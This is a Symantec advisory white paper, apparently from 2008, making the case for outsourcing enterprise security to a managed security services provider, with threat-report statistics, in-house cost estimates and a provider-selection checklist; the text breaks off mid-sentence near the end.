B-Adv Guide Can Managing Ent Sec Be Made Easier 13670834-1.en-Us

Symantec Global Services
Confidence in a connected world.

Can Managing Enterprise Security Be
Made Easier?
A Symantec Advisory Guide
Who should read this guide:
CSOs, CISOs, managers, compliance officers, heads of security, CIOs, and
project managers faced with the challenge of managing enterprise security
Advice offered about:
Common hurdles when managing enterprise security in-house
Benefits of partnering with a Managed Security Service Provider (MSSP) for security protection
Sample expenses and cost comparison scenarios
Evaluating potential MSSPs
We tried to provide this level of security on
our own. We had two full-time employees
looking at our own IDS sensors at one
point. But trying to maintain signatures
and updateswhile continually inspecting
and correlating events from the logswas
becoming quite a feat.
Network engineer
Introduction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Considering the security management options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Who should read this guide?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
What you will get from reading this guide. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
60-second insightone minute to see how Symantec Managed Security Services
can improve your security posture. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
The threat landscape continues to evolve . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Cyber-criminals continue to exploit trusted environments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Rise in site-specific vulnerabilities. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Common hurdles when managing enterprise security in-house . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Measuring the cost of managing security in-house . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Equipment. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Hardware and software costs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Maintenance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Certifications and attestations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Personnel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Recruiting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Training and education . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Security operations center . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Benefits of managed security services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Improve information protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Leverage knowledge and experience of security experts. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Stay abreast of the most recent security threats and attacks. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Share responsibility with a trusted security partner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Consistent SLAs across the organization. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Contents
Can Managing Enterprise Security Be
Made Easier?
Considerations for Partnering with a Managed Security
Services Provider for Security Protection
3
Gain reliable 24x7x365 security management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Concentrate on what you do best. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Maximize investment on existing security products. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Make project and running costs more predictable. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Continuous improvement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Selecting a managed security services provider. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Breadth of supported technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Security management processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Auditing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Effectiveness of technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Reporting. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Security operations center capabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Recommended MSSP checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Symantec Global Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Conclusion. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Symantec Global Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Symantec Managed Security Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Symantec Residency Services. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Symantec Advisory Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Symantec DeepSight Early Warning Services. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Free 30-day trial service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Symantec Managed Solutions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
To find out more. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Contents, cont'd
Effective information security helps maintain the integrity of valuable corporate assets, enables
compliance with industry regulations, and helps ensure the integrity of a trusted brand image and
sustain business continuity. But providing an effective level of security requires a combination
of state-of-the-art technology, experienced personnel, proven processes, and continuous threat
intelligence that few organizations possess.
Those organizations that choose to tackle these critical issues in-house invariably find themselves
struggling to identify security events, provide security event alerts, and respond to the threats.
Specifically, the challenge is how to quickly identify which assets are at risk, determine the impact
of security breaches, and prioritize incident response within the company. In order to make good
decisions and protect information assets, companies must have the resources to understand what
is happening both inside and outside the corporate network.
Security technologiesincluding firewalls, network and host intrusion detection, and prevention
systemshave created a tremendous volume of information, and handling that information only
makes a companys security problems more challenging. As a result, many organizations that
currently manage security in-house are looking for alternatives. These organizations often find
themselves choosing between two options: managing security in-house, or outsourcing either all
or some security management to a managed security services provider (MSSP).
To ensure rapid response to real threats, MSSPs use high-availability security operations centers
(SOCs) to provide outsourced management and monitoring of security devices and events. These
centers support 24x7 services designed to reduce the number of operational security personnel
an enterprise must hire, train, and retain in order to maintain an acceptable security posture.
Considering the security management options
It is essential that organizations weigh the risk of sharing their data with third parties against
that of losing intellectual property and productivity as a result of malicious activity. Only robust,
round-the-clock security management and monitoring can help mitigate the risk of threats against
an enterprise network.
However, the wide range of MSSPs and their offerings can prove daunting to compare and
understand. We commissioned this guide to help organizations weigh their security management
options.
Grant Geyer
Vice President, Symantec Managed Security Services
Introduction
Can Managing Enterprise Security Be Made Easier?
Without a sound security
strategy, our organization
would likely be out of
business.
Director of technology
5
Who should read this guide?
CSOs, CISOs, managers, compliance officers, heads of security, CIOs, and project managers faced
with the challenge of managing enterprise security. This can include mail security; compliance; IT
risk; and the monitoring, identification, and remediation of security incidents and events.
What you will get from reading this guide
An understanding of the changing threat landscape and common hurdles you face when
managing enterprise security in-house
The benefits of partnering with a MSSP for security protection
Sample expenses and cost comparison scenarios to help you produce a financial analysis when
considering a MSSP
Useful guidance for evaluating potential MSSPs
6
60-second insightone minute to see how Symantec Managed Security
Services can improve your security posture
Benefit from extensive global threat intelligence
Symantec Managed Security Services has access to some of the most
comprehensive sources of Internet threat data in the world. Leveraging the
Symantec Global Intelligence Network, managed services teams are thoroughly
informed on world events, which accelerates the decision-making process to protect
your critical assets.
Avoid the impact of a missed security event.
Leverage security expertise for 24x7 monitoring, alerting on suspicious incidents,
and delivery of timely, prioritized remediation recommendations. Symantec
Managed Security Services security analysts and security operations center (SOC)
technology help keep your business assets safe from compromise.
Find the needle in the haystack
Symantec Managed Security Services technology and security analysts look for
small pieces of separate information in gigabytes of log files across multiple
devices, and then recognize which pieces, when put together, indicate a threat.
Symantec has built in-house technology to filter all customer information and
present events to analysts for further investigation.
Support for your audit requirements
Symantec Managed Security Services globally maintain the stringent audit
requirements of the ISO 27001 certification and SAS70 Type II Audit Report, and
include certifications for both business continuity planning and disaster recovery.
Our mature approach to governance will ensure that an incident or disaster in one
region will not affect the support you receive or compromise the integrity of your
business.
7
On April 8, 2008, Symantec released Volume XIII of the industry-leading Global Internet Security
Threat Report (ISTR).
In the report, Symantec concludes that cyber-criminals are becoming increasingly professional
even commercialin the development, distribution, and use of malicious code and services.
While cyber-crime continues to be driven by financial gain, cyber-criminals are now using more
professional attack methods, tools, and strategies to conduct malicious activity. Based on the data
collected during this timeframe of July 1December 31, 2007, Symantec has observed that the
current security threat landscape is predominantly characterized by the following:
Malicious activity has become Web-based.
Attackers are targeting end users instead of computers.
The underground economy is becoming consolidated and mature.
Attackers and attack activity are adapting rapidly.
Cyber-criminals continue to exploit trusted environments
During the reporting period, Symantec has observed that the majority of effective malicious
activity has become Web-based: the Web is now the primary conduit for attack activity. This may
be driven, in part, by the fact that compromises affecting computers on enterprise networks are
likely to be discovered and shut down. On the other hand, activity that takes place on end users
computers and/or Web sites is less likely to be detected.
Symantec observed that 58% of all vulnerabilities disclosed were in Web applications. Once a
trusted Web site has been compromised, cyber-criminals use it as a source for distribution of
malicious programs in order to compromise individual computers. This attack method allows
cyber-criminals to wait for their victims to come to them instead of needing to actively seek out
targets.
Social networking Web sites are increasingly valuable to attackers because they provide access to
a large number of people, many of whom trust the site and its security. These Web sites can also
expose a great deal of confidential user information that can then be used in attempts to conduct
identity theft or online fraud.
An added benefit to attackers who target trusted sites is the ability to steal credentials or launch
other attacks en masse because these tactics can allow attacks to propagate quickly through a
victims social network.
The threat landscape continues to
evolve
8
It would be cost-
prohibitive to try to cover
this ground on our own.
Table 1. Personal information that can be used for financial gain is traded on underground
economy servers. This table ranks goods most frequently offered for sale.
Rise in site-specific vulnerabilities
Site-specific vulnerabilities are perhaps the most telling indication of this trend. These are
vulnerabilities that affect custom or proprietary Web-application code for a specific Web site.
During the last six months of 2007, 11,253 site-specific cross-site scripting vulnerabilities were
documented. This is considerably higher than the 2,134 traditional vulnerabilities documented by
Symantec during this same period.
These vulnerabilities are a concern because they allow attackers to compromise specific Web
sites that they can then use as a means of launching subsequent attacks against userswhich
has shown to be an effective strategy for launching multi-stage attacks and exploiting client-side
vulnerabilities.
Site-specific vulnerabilities are often used in association with browser plug-in vulnerabilities,
which are useful for conducting sophisticated Web-based attacks. Another indication of the Webs
emergence as an attack vector is the continued growth in browser plug-in vulnerabilities. Browser
plug-ins are technologies that run inside the Web browser and extend the browsers features,
such as those that allow additional multimedia content from Web pages to be rendered in the
browserActiveX, for example. These vulnerabilities have remained popular because they are a
very effective means of conducting Web-based attacks.
In the second half of 2007,
499,811 new malicious
code threats were reported
to Symanteca 136%
increase over the first half
of 2007.
9
Rank Item Percentage Range of prices
1 Bank accounts 22% $0.40$20
2 Credit cards 13% $10$1000
3 Full identities 9% $1$15
4 Online auction accounts 7% $1$8
5 Scams 7% $2.50/week$50/week for hosting. $25 for design
6 Mailers 6% $1$10
7 Email addresses 5% $0.83/MB$10/MB
8 Email passwords 5% $4$30
9 Drop (requests or offers) 5% 10%50% of total drop amount
10 Proxies 5% $1.50$30
Table 2. Symantec Internet Security Threat Reportdata sources
Figure 1. This chart shows malicious code trends. In the second half of 2007, 499,811 new
malicious code threats were reported to Symantec. This is a 136% increase over the first half of
2007.
10
Symantec uses multiple data sources to compile the Internet Security Threat Report, including:
More than 40,000 sensors that monitor network activity in more than 180 countries
Reports on malicious code, spyware, and adware from more than 120 million systems that have deployed
Symantec virus protection products
A security vulnerability database spanning more than a decade that covers more than 25,000
vulnerabilities from more than 8,000 vendors
BugTraq; a forum for the disclosure and discussion of vulnerabilities, with approximately 50,000 direct
subscribers
The Symantec Probe Network: a system of more than two million decoy accounts that attracts email
messages from 30 different countries around the world, allowing Symantec to gauge global spam and
phishing activity
550,000
500,000
450,000
400,000
350,000
300,000
250,000
200,000
150,000
100,000
50,000
0
N
u
m
b
e
r

o
f

n
e
w

t
h
r
e
a
t
s
Period
JulDec
2002
JanJun
2003
JanJun
2004
JanJun
2005
JanJun
2006
JanJun
2007
JulDec
2003
JulDec
2004
JulDec
2005
JulDec
2006
JulDec
2007
499,811
212,101
74,482
50,761 53,410
48,226
42,523
20,451
8,475 9,138
6,260
With customers and business partners dependent on accessing critical product and service
data via open networks such as the Internet, organizations must ensure the integrity of this
information or risk jeopardizing their reputation and their brand equity. In short, they need to
protect the bottom line, the corporate image, and the brand.
Organizations face a number of barriers to achieving and maintaining effective security programs,
including those listed in table 3.
Table 3. Barriers to achieving and maintaining effective security programs
Common hurdles when managing
enterprise security in-house
Hiring more staff for a
24x7 immediate response
team would have greatly
increased our staffing
costs.
Group leader
11
Security a core requirement,
but not a core competence
Companies focusing on eCommerce and eBusiness must ensure that
their information assets are properly protected. Managing information
security requires constant vigilance and strict accountability for
every change in the state of the network and systems connected to
it. Organizations often find they lack the necessary in-house skills to
manage this challenging task.
Need to find, hire, and retain
security staff
Because of the strong market demand for skilled information security
talent, organizations are finding it expensive to recruitand extremely
difficult to retainthese professionals. A large amount of time can
be absorbed by the constant juggling of resources, resume sifting,
interviews, contracts, and attrition.
The high attrition rate among security personnel reduces a companys
ability to effectively safeguard its valuable information assets.
Security staff overloaded with
routine daily operations
While the security staff commits to the tasks, they often discover that
they lack time, expertise, and technical resources to provide effective,
enterprise-wide monitoring and management on a 24x7x365 basis.
Need to develop a repeatable
process for identifying and
escalating security incidents
Trying to determine what constitutes a security incident can be difficult.
Traffic that looks benign to the untrained eye can be highly malicious
when correlated with other security information.
Understanding how to develop a repeatable process that can be quickly
and consistently executed can be daunting for many organizations,
especially when there is a low margin for error.
Security products generating
vast amounts of difficult-to-
manage data
In order to adequately protect corporate information assets on a
24x7x365 basis, and to identify and counteract security attacks in real
time, information security staff must constantly analyze disparate data
from various security devices, such as firewalls and intrusion detection
systems (IDSs). Security staff can attempt to consolidate this data for
viewing purposes, but most consolidation software tools lack the ability
to generate meaningful information.
Symantec finds that 99.7% of data produced by security devices is of
little to no value in finding security incidents; moreover, such data is
often laden with false positives. Finding the real security threats in this
overwhelming volume of data can be like finding the proverbial needle
in a haystack.
Table 3, cont'd
12
Finding the real
security threats in this
overwhelming volume of
data can be like finding a
needle in a haystack.
Growing volatility and
sophistication of threats
The threat landscape has evolved away from large-scale pandemic
threats to quieter, more targeted attacks engineered to include
multiple exploitation methods. These lower-profile, targeted attacks
are engineered by cyber-criminals searching for new ways to steal
information for financial gain.
The attacks propagate more slowly to avoid detection and to increase
the likelihood of successful compromise before security measures can
be put in place. The new Internet threat reality is clear: Fraudsters and
hackers are working in concert for financial gainand they are relying
increasingly on the Internet.
Proactive intelligence Setting up a security operations center in-house can be an expensive
and cumbersome task, and many organizations that do so still arent
aware of emerging Internet threats and vulnerabilities. Organizations
that dont stay abreast of new threats are on their own on the Internet.
They are left to react to new challenges as opposed to being proactively
protected.
Cost-effective security
protection on a 24x7 basis
Increased regulatory demands for business continuity coupled with
a thrust for availability of systems to clients and partners is driving a
requirement for cost-effective security protection on a 24x7x365 basis.
The cost of building and staffing an SOC is daunting; it involves hiring
24x7x365 staff, implementing and tuning security information and
event management (SIEM) technology, establishing processes, and
managing the function. Furthermore, there is a high cost of entry just to
have an in-house security management capability, regardless of the size
of the security architecture being managed.
To build, upgrade, maintain, operate, and control its security systems, any in-house security
management program needs personnel and supporting hardware, software, and equipment. These
in-house programs also require outlay for the following variables:
All relevant capital and operating costs
Costs of supervising the MSSP
Likely increases in costs for salaries, benefits and service contracts
The cost of money and interest costs
Residual value of equipment and facilities
Cost of transition, including personnel
Cost of changes in direction and level of resources
Cost of contract modifications
To effectively compute the total cost of ownership of in-house security management, companies
need to identify and evaluate both overt and hidden costs over a number of years. The following
sections list many of the costs of a security management program.
Equipment
Hardware and software costs
For in-house security management, companies must determine the cost of all hardware and
software in addition to associated maintenance and support costs. This includes servers, PCs, and
peripheral equipment, as well as all associated operating systems, databases, applications, and
security software.
Additional hardware and software required to support security operations may include system
and network management tools, fault management systems, help desk systems, and correlation
technology.
While the software alone is expensive, to work effectively, the organization will also need to
integrate and customize the software for their environment. These costs may be several times the
cost of the software to be effective.
Maintenance
Maintenance fees for software and equipment must be factored into the total cost of ownership.
Software maintenance is typically assessed on an annual basis at a rate of 15 to 25 percent of the
cost of the software.
Measuring the cost of managing
security in-house
If our network is down
because of a security
incident, or for any other
reason, we calculate that
our organization would lose
a million dollars of revenue
a day.
13
Certifications and attestations
In order to show the effectiveness of the security program as well as to stay compliant with
industry regulations, the environment will need to be audited. While many SOCs are becoming
compliant with the ISO17799 or ISO27001 standard, they will also need to be included in
Sarbanes Oxley, MiFID, or Basel II audits. While these certifications themselves are quite difficult
to obtain and ongoing maintenance is required, the real challenge is to develop all of the
processes needed to run the operation on a day-to-day basisand to ensure that it is effective
and integrated within the overall information security and information technology program.
Personnel
Staffing for information security professionals is perhaps the most crucial, difficult, and costly
component of an effective security management program.
While the salary of individual contributors may vary from $60,000 to $140,000 (averaging
$85,000 to $90,000) based upon experience and skill, this is only a small part of their
compensation. After bonuses and stock incentives, space and equipment costs, and the cost of
ongoing education and training benefits are added in, these numbers may be over 50 percent
higher.
The following scenario can aid in calculating the costs to expand security operations from
standard 8am-to-5pm to full 24x7 coverage. To provide coverage 365 days per year, a company
must consider staffing multiple shifts of workers:
Three sets of staff to cover three eight-hour shifts
One backup for time-off coverage for shifts 1, 2, and 3
One manager
Based on these assumptions, a company would need a minimum of five people to cover one seat
in a 24x7 security operationand these five would need to possess expertise or specialization in
a range of security issues.
Recruiting
Given the high turnover rate in the IT field, organizations may also need to consider the cost of
recruiting. Whether internal HR staff or external recruiters are used, the cost of recruiting may
average 20 to 30 percent of total annual compensation costs for the position being recruited.
14
In each country where we
have deployed managed
security services, our
company is saving on
employing full time
equivalent (FTE) staff.
Altogether, we have been
able to re- allocate roles
for 10 staff in EMEA, which
is equivalent to a savings
of almost $1.2 million
every year.
European IT security head
Training and education
Security professionals require continuous training and education to hone their skills and, more
importantly, to stay aware of the latest updates in an ever-changing, fast-paced technology
environment.
Ongoing education should encompass the latest security tools and technologies, threat
techniques, and best-practice protection strategies. Costs in this area may include:
Product or technology training
Training in general security awareness
Certification preparation classes
Certification costs
Attendance at major security conferences or shows
Books, magazine subscriptions, journals, or eLearning courses to help security professionals
stay abreast of the latest technologies, tips, techniques, threats, and safeguards in the industry
Many organizations provide their personnel with two weeks of employee training each year,
though more is often necessary. Most security courses are one week in duration; therefore, each
security employee would be eligible to attend two security courses per year. Because course
expenditures may range from $1000 to $3000, an average cost per headcount for annual training
would be $5000.
Security operations center
An SOC provides a secure work environment. Typically this area needs to be physically separated
from the rest of the facility, requiring strong authentication to enter.
Most companies find it cost-prohibitive to build or lease an SOC because the cost can exceed $10
million (USD) in capital expenditures. Organizations also need to consider the need for power,
HVAC, and fire suppression systems for their SOC. In addition, a disaster recovery plan that would
likely involve the build-out of a failover facility should be taken into account.
However, to build a full end-to-end SOC as a business, MSSPs invest between $25 million and
$40 million (USD) for the required robust infrastructure, tools, and redundancy. Companies that
choose to work with a MSSP benefit from these significant investments as well as the expertise of
trusting their business to security experts.
15
Beyond pure cost, there are a number of advantages an organization receives from a
professionally managed service contract with a team of dedicated, experienced security
professionals.
Partnering with an experienced, well-established, and professional MSSP offers enhanced levels of
protection, 24x7x365 vigilance, a strengthened security posture, and a potential decrease in the
risk of cyber-threats.
Improve information protection
Providing security for todays networks and information systems is an increasingly complex
and critical endeavor, especially as hackers are using increasingly sophisticated methods and
technologies. Organizations whose core focus is not security are at a disadvantage in providing
a comprehensive, 24x7 security management program. The training, expertise, and diligence
required to stay abreast of the latest protection strategies is time-consuming for in-house staff
and distracts from other mission-critical activities.
Additionally, the vast amounts of data produced by firewalls and intrusion detection system
devices can quickly overwhelm an organization that lacks the sophisticated technology to help
its security staff with the daunting task of filtering through the data to find the real threats and
eliminate the false positives.
Leverage knowledge and experience of security experts
According to Gartners April 2007 report MarketScope for Managed Security Services in Europe,
client discussions consistently say that the skilled resources of providers are one of the major
benefits of using MSSPs.
Organizations can take advantage of the expertise of MSSP security analysts and engineers who
manage and monitor security devices on a full-time basis. These analysts identify and respond
to thousands of security incidents and attacks every day. This means that, compared to an
organizations in-house security staff, they are more aware of potential threats and are more
knowledgeable about best practices for protecting critical data.
Benefits of managed security services
16
The bottom line is that we
can react in real-time to
any security threats that
take place, while keeping
our security management
costs in check.
Head of IT security
Stay abreast of the most recent security threats and attacks
An experienced MSSP maintains a research capability dedicated to staying abreast of the latest
cyber-threats, vulnerabilities, hacker techniques, and security developments. Constant monitoring
of security alerts and advisories is essential to providing maximum protection against security
threats.
Share responsibility with a trusted security partner
A MSSP acts as the companys security partner and shares the burden and the responsibility of
security management and incident response.
Consistent SLAs across the organization
MSSPs offer service-level agreements (SLAs) that define a contractual obligation to deliver
services in a particular manner and within a specific response-time window. The SLAs determine
the services the MSSP will provide and the performance targets they must achieve, and they
define exactly what will be delivered and when specific organizational requirements will be met.
Gain reliable 24x7x365 security management
A thorough MSSP will provide around-the-clock coverage for a clients most critical systems,
monitoring networks and infrastructures to ensure protection during the hours most hackers
attack. This vigilance, especially important in an always-on, always-connected business
environment, ensures that information assets are protected.
Concentrate on what you do best
Resource-constrained IT departments must support the companys core business and security
requirements. In an ideal world, talented in-house IT resources would be leveraged to plan
network redesigns and migrations in order to support strategic business initiatives, or to
implement new applications that focus on areas of greater return-on-investment (ROI) potential.
Many elements of security, such as compliance and antivirus, can be very labor-intensive
and subject to human error. Partnering with a MSSP removes the burden of constant device
monitoring and management. This enables organizations to direct in-house resources toward only
the most pressing security issues and vulnerabilities.
Partnering with a MSSP
removes the burden of
constant device monitoring
and management, enabling
organizations to direct
in-house resources toward
only the most pressing
security issues and
vulnerabilities.
17
Maximize investment on existing security products
Many organizations purchase security products that, for a variety of reasons, are never fully
implemented. A high-quality MSSP ensures that purchased solutions are installed, implemented,
and integrated to provide the ongoing value an organization needs and expects.
Make project and running costs more predictable
By partnering with a MSSP to protect critical information assets, organizations can avoid the
extensive personnel costs associated with hiring, training, and retaining security professionals.
Managed security services reduce total cost of ownership by delivering predictable monthly costs
for security coverage. Because managed services are billed on a monthly basis, organizations are
also better able to predict and manage their security-related budgets.
Continuous improvement
By tapping into the expertise of a company comprised of literally thousands of security experts
working in the field every day, you will always be at the forefront of security knowledge and
expertise.
18
Determining the cost of partnering with a managed security services provider is only one, limited
criterion in the overall evaluation of MSSPs. Organizations should also consider the following key
factors:
LongevityConsider partnering with a stable vendor that has a proven track record of
delivering quality services to a large number of clients over a long period of time. These are the
MSSPs most likely to weather economic downturns or industry shakeouts.
Annual revenuesFor publicly traded companies, according to Gartner, annual run rates of
more than $10 million per year in managed security services contracts indicate a sufficient
base of revenue to support growth and enhancement of services.
Management experienceA successful MSSP selects its security experts from a range
of backgrounds, including the military, government, and industrial sectors. Appropriate
management experience is usually represented as well, from a variety of related services such
as online, financial, and service bureaus.
Range and flexibility of the servicesThe range of services offered indicates the MSSPs
ability to meet evolving security management needs of a wide variety of organizations. Leading
MSSPs will offer a complete set of managed and consulting security services, either organically
or through partnerships. Services should include managed mail security; managed firewall;
managed intrusion detection system; threat and vulnerability management; security intelligence
services; and monitoring, remediation, and reporting tools. Ideally, the MSSP will offer multiple
levels and types of services, as well as customized services to meet the unique organizational
requirements of each client.
Breadth of supported technologies
Evaluating a MSSP on its ability to provide broad support for multiple technologies is essential
to ensuring a smooth and effective managed security program. Some MSSPs will only manage
certain security technologies; others will provide comprehensive multivendor support.
Security management processes
A MSSP should be able to provide documented standards and policies for handling both typical
and atypical operations and threats. It should also offer a variety of attack alert notification
methods to give the clients security staff the ability to mitigate risk in real time. A MSSP should
facilitate the incident response phase, integrating the capabilities of the client incident response
team (IRT) with the MSSP alerting process. This requires a pre-defined and shared incident
response roadmap.
1
Gartner RAS Core Research Note G00149649, Kelly M. Kavanagh, John Pescatore, 1 August 2007 RA4 8/4/2008. The Magic Quadrant is copyrighted
2006 by Gartner, Inc. and is reused with permission. The Magic Quadrant is a graphical representation of a marketplace at and for a specific time period.
It depicts Gartner's analysis of how certain vendors measure against criteria for that marketplace, as defined by Gartner. Gartner does not endorse any
vendor, product, or service depicted in the Magic Quadrant, and does not advise technology users to select only those vendors placed in the "Leaders"
quadrant. The Magic Quadrant is intended solely as a research tool, and is not meant to be a specific guide to action. Gartner disclaims all warranties,
express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
Selecting a managed security services
provider
The managed security
service (MSS) market in
North America generated
revenue of approximately
$500 million in 2006, and
Gartner estimates that
revenue will grow about
19% in 2007.
Gartner, Magic Quadrant
for MSSPs, North America,
1H07
1
19
Auditing
Companies are being held to a higher standard of accountability with respect to audit
requirements. As an extension of the organization, a MSSP must have facilities, processes, and
procedures that are validated and certified by a third-party auditor in the form of an ISO27001
and/or SAS70 Type II audit.
Effectiveness of technology
The technology used to analyze and correlate data collected from multiple devices should support
rapid response while ensuring the scalability to support an ever-increasing number of managed
devices. So that clients can focus their security staff on the most critical issues, the technology
should be supported by security analysts who can separate real threats from false ones.
Reporting
Reporting can provide an enterprise-wide, real-time view into the clients security posture and
the effectiveness of the managed services. Thorough reports will include detailed information
gathered from the managed devices, from the related or recommended responses, from any
changes the MSSP has made to the devices, and from information about the latest threats. Ideally,
the MSSP will provide options for viewing and managing reports, including access via email,
standard desktop programs, and a secure Web portal.
Security operations center capabilities
A MSSP will need to operate multiple security operations centers from which it can globally
monitor and manage security issues across its client base. In todays business environment, these
centers must be run 24x7x365. This is not only to remain abreast of the latest threats, but also
to ensure business continuity. The centers must follow predictable and proven processes and
be staffed with a range of security experts that extend the clients in-house capabilities. Strict
hiring guidelines must ensure that hackers are not entrusted with the sensitive security data of an
enterprise.
20
Determining the cost of
partnering with a MSSP is
only one, limited criterion
in the overall evaluation.
Recommended MSSP checklist
Real-time monitoring, analysis, and incident response
Security is core business
Demonstrated long-term financial stability
Global online community providing insight and intelligence
Uses proven managed security services policies, standards, and procedures
Recruited and trained professional security staff
Real-time view through flexible client interface
Defined staff development and career path
Background checks to verify staff trustworthiness
24x7x365 manned global operations
Multiple, redundant SOCs with disaster recovery and global coverage
In-depth technical and security support skills
Dedicated threat and vulnerability research support
Dedicated team per client
Services support multiple vendors products
Can implement security products
Security and financial risks accepted under contract
Defined metrics and accountability
Incident-handling and response capability
21
Conclusion
Effective security management requires a comprehensive combination of skilled personnel, best
practice processes, and state-of-the-art technology.
Each organization will come to a different conclusion about whether to manage their security
requirements in-house, partner with a MSSP, or decide on a combination of both.
A thorough cost analysis is important when evaluating a MSSP, but it comprises only part of the
total analysis. Levels of staffing, security expertise, specialized skills that may only exist in-house,
and existing security investments are other important considerations.
Deciding between leveraging in-house security resources and partnering with a MSSP requires
research and budgetary scrutiny. It also requires consideration of both the short- and long-term
expenses and benefits.
Ultimately, you should choose the option that will allow you to maintain a strong security posture
that enables you to pursue your primary mission, whether that is a revenue-generating or service
opportunity.
With nearly 4,000 professionals and an extensive partner network, Symantec Global Services
offers deep technical knowledge and proven expertise to help you manage IT risk, performance,
and cost.
Symantec offers several services that help manage and reduce security risks, giving your
organization the foundation to protect its systems, data, and applicationsall while providing the
reliability, flexibility, and performance needed to rapidly respond to changing business needs.
Symantec Managed Security Services
Symantec Managed Security Services provides 24x7 remote monitoring and management of labor-
intensive security operations under strict SLAs. As a result, you can confidently focus existing
resources on strategic projects that drive a competitive advantage for your business.
22
Thanks to the way that
Symantec Managed
Security Services filters
threats, we only have to
respond personally to one
or two attacks a month,
compared to up to 60
with our previous security
vendor.
Manager of information
technology and security
Based on groundbreaking SOC technology from Symantec, Symantec Managed Security Services
are delivered through a unique and highly effective combination of skilled personnel, best-practice
processes, and state-of-the-art technology.
Key offerings include:
Security Monitoring Services
Global Intelligence Services
Security Device (IDP) Management Services
Log Management Services
Vulnerability Assessment Services
Managed Threat Analysis
Symantec Intrusion Detection/Protection Solution with Sourcefire
Our unique combination of insight, research, and expertise allows us to relieve your organization
of the burden of analyzing and correlating critical security intelligence as it provides greater
